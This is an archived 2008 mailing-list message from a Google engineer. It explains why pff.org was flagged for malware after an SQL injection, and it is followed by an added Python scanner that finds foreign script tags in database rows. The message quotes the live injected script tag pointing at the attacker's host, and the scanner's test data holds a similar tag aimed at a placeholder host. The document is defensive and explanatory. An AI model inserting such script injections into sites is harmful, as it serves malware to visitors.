Interesting People mailing list archives

from Google -- Google blocking opinions with which it disagrees regarding "network neutrality?" EXPLAINATION?? and comment djf


From: David Farber <dave () farber net>
Date: Mon, 14 Jul 2008 09:37:15 -0700


________________________________________
From: Niels Provos [niels () google com]
Sent: Monday, July 14, 2008 11:50 AM
To: David Farber
Cc: ip
Subject: Re: Google blocking opinions with which it disagrees regarding "network neutrality?" EXPLAINATION?? and comment djf

Hi David,

I noticed your post on the Interesting People mailing list today.   I
am hoping to clear up some of the confusion and speculation. Google
has been flagging sites that can infect visitors with malware for
about two years.   This process is completely automated.   Let me give
you some background on what happened with Pff.org:

Pff.org uses an SQL database for storing their content.  As the web
application running the site did not properly sanitize user-supplied
arguments, Pff.org became victim to a so-called SQL injection attack:

  http://en.wikipedia.org/wiki/SQL_injection
  http://www.youtube.com/watch?v=MJNJjh4jORY (this gives a concrete example)

SQL injection is enabled by faulty server code in the web application,
e.g. missing escaping of user supplied arguments.  On July 11th,
Google's scanners detected the following malicious code:

 <script src=http://www.ausbnr .com/ngg.js>

The script causes malicious code to be executed in a visitor's browser
with the purpose of downloading malware binaries.  Malware is often
used to remote control the machines of compromised users and to steal
their banking credentials, etc.

The problem seems to be constrained to pages under
pff.org/issues-pubs/ - here is an example of what we found:

<img src="../images/home/blackbullet.gif" width="14" height="14"
align="absmiddle">&nbsp;<a
href="http://www.pff.org/issues-pubs/unavailable.html"
class="menu">Eisenach, Jeffrey A. "The Digital Economy." Address at
the George Mason University conference on <em>The Old Dominion and the
New Economy</em>, November 1998.<script src=http://www.ausbnr
.com/ngg.js></script></a><BR>

Pff.org can resolve this problem by repairing their web application to
properly sanitize SQL commands constructed from user input.   Without
properly sanitizing user-supplied arguments, the site will likely get
compromised again in the future - there is a surge in SQL injection
attacks at the moment.

To make our processes more transparent, we are providing a Safe
Browsing Diagnostic page that contains detailed information:

  http://www.google.com/safebrowsing/diagnostic?site=pff.org/issues-pubs/

We also email web masters when their site gets flagged and provide
further information to site owners via the web master console.
Technical details about the malware detection infrastructure can be
found in a technical report we made available in February:

  http://googleonlinesecurity.blogspot.com/2008/02/all-your-iframe-are-point-to-us.html

Let me know if you need more information.

Niels.
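
An added example, not part of the original message and not Google's tooling: after an injection like the one described above, a site owner can sweep stored content for <script src=...> tags that load from hosts the site does not use. The allowlist, the `pubs` table with its rows, and the `injected.example` host are constructed for illustration.

```python
import sqlite3
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the only hosts this site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.pff.org", "pff.org"}


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> start tag."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag == "script" else None
        if src:
            self.sources.append(src.strip())


def foreign_script_sources(html):
    """Return <script src> values whose host is not on the allowlist."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    hosts = ((src, urlparse(src).hostname) for src in collector.sources)
    # hostname is None for relative URLs, which load from the site itself.
    return [s for s, h in hosts if h and h.lower() not in ALLOWED_SCRIPT_HOSTS]


def scan_rows(rows):
    """Map row id -> foreign script sources, for (id, text) rows that have any."""
    found = {}
    for rid, text in rows:
        hits = foreign_script_sources(text or "")
        if hits:
            found[rid] = hits
    return found


def build_sample_db():
    """Constructed sample rows: one clean, one with an appended script tag."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pubs (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pubs VALUES (?, ?)", [
        (1, "Address at the conference on <em>The New Economy</em>."),
        (2, "The Digital Economy.<script src=http://injected.example/x.js></script>")])
    return conn
```

Calling `scan_rows(conn.execute("SELECT id, title FROM pubs"))` on the sample database reports row 2 only. Cleaning the flagged rows does not remove the underlying flaw; the queries that accept user input still need to be fixed.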


